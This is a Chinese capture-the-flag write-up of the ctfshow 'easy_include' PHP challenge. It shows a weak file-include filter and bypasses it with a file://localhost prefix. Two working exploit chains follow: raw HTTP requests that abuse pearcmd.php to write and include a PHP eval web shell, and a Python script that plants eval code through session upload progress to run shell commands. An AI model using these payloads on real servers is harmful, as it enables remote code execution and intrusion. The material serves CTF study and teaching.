# easy_include
题目:
<?php | |
/**
 * Challenge-side filter applied to the include target.
 *
 * Every '.' is stripped from $path first, and the remainder only has to start
 * with at least one lowercase ASCII letter. Nothing after that leading run of
 * letters is inspected, which is why a value such as "localhost/<absolute path>"
 * passes this check unchanged (see the write-up below).
 *
 * @param string $path Raw include target, here taken straight from $_POST[1]
 * @return int|false preg_match() result: 1 on match, 0 on no match, false on PCRE error
 */
function waf($path)
{
    $stripped = str_replace('.', '', $path);

    // Anchored at the start only; no end anchor, no allow-list of characters.
    return preg_match('/^[a-z]+/', $stripped);
}
// Entry point of the challenge: the include target arrives untrusted in
// $_POST[1], and waf() is the only gate before include. Only the "file://"
// scheme is fixed; the remainder of the path is entirely caller-controlled.
$target = $_POST[1];
if (waf($target)) {
    include 'file://' . $target;
}
题目设置了一个 waf 函数,利用 str_replace 函数去除 $path 中所有的点(.)。
然后使用 preg_match 函数检查修正后的路径是否以一个或多个小写字母开头,最后将文件包含仅限于使用 file 协议进行文件包含。
表面上看有限制,实际上由于 include "file://".$_POST[1];
可以说是毫无过滤点,唯一需要绕过的就是必须以小写字母开头,
可以利用 file://localhost 来绕过:file://localhost/路径 与 file:///路径 指向同一本地文件,因此只需在绝对路径前加上 localhost 即可满足“以小写字母开头”的检查。
这里介绍两种解法:
1. 裸文件包含。
POST /?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST[%27cmd%27]);?>+/tmp/cmd.php HTTP/1.1 | |
Host: c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show | |
Origin: http://c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show | |
Cache-Control: max-age=0 | |
Upgrade-Insecure-Requests: 1 | |
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 | |
Accept-Encoding: gzip, deflate | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | |
Referer: http://c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show/ | |
Content-Length: 51 | |
1=localhost%2Fusr%2Flocal%2Flib%2Fphp%2Fpearcmd.php |
然后:
POST / HTTP/1.1 | |
Host: c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show | |
Origin: http://c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show | |
Cache-Control: max-age=0 | |
Upgrade-Insecure-Requests: 1 | |
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 | |
Accept-Encoding: gzip, deflate | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | |
Referer: http://c74ca0b5-a423-4760-ae38-2448b12c1c77.challenge.ctf.show/ | |
Content-Length: 51 | |
1=localhost/tmp/cmd.php&cmd=system("cat /f*"); |
即可。
2. session 文件包含。
import requests | |
# Author:ctfshow-h1xa | |
# Base URL of the challenge instance (page-specific value).
url: str = "http://23509e94-3672-4f0e-8471-fd321235c9e0.challenge.ctf.show/"
# Form fields sent alongside the multipart upload.
data: dict[str, str] = {
# PHP's session.upload_progress feature writes this field's value into the
# session file while the upload is in flight (presumably enabled on the
# instance, which is PHP's default — confirm). That is what makes the session
# file below contain attacker-controlled text.
'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[2]);?>',
# Include target for the challenge's $_POST[1]; the "localhost" prefix is what
# satisfies waf()'s leading-lowercase-letter check, and sess_ctfshow matches
# the PHPSESSID cookie set further down.
'1':'localhost/tmp/sess_ctfshow',
# Read by the eval() in the included session file.
'2':'system("ls /");'
}
# A multipart file part is required, otherwise session.upload_progress does
# not fire; the content is irrelevant.
file: dict[str, str] = {
'file': 'ctfshow'
}
# Pins the session id so the session file name (/tmp/sess_ctfshow) is known.
cookies: dict[str, str] = {
'PHPSESSID': 'ctfshow'
}
# Single request: upload and include happen in the same round trip. Whether the
# session file still holds the progress data when include runs depends on
# session.upload_progress.cleanup timing — TODO confirm on the instance.
# Mitigation side: do not include user-controlled paths at all; disabling
# session.upload_progress.enabled removes this particular write primitive.
response = requests.post(url=url,data=data,files=file,cookies=cookies)
print(response.text)
简单粗暴。
关于这两种方法的介绍可以查看我的这篇文章:
https://p1kap1.github.io/knowledge/文件包含/